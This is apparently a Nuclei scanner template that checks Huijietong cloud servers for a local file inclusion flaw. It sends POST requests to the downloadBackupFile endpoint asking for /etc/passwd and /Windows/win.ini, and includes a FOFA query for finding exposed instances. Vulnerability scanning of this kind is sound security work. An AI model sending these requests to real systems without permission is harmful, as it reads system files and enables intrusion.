id: huijietong-cloud-fileread

info:
  name: Huijietong - Local File Inclusion
  author: princechaddha,ritikchaddha
  description: Huijietong is vulnerable to local file inclusion.
  severity: high
  metadata:
    fofa-query: body="/him/api/rest/v1.0/node/role"
  tags: huijietong,lfi

requests:
  - method: POST
    path:
      - "{{BaseURL}}/fileDownload?action=downloadBackupFile"
    body: 'fullPath=/etc/passwd'

  - method: POST
    path:
      - "{{BaseURL}}/fileDownload?action=downloadBackupFile"
    body: 'fullPath=/Windows/win.ini'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/03
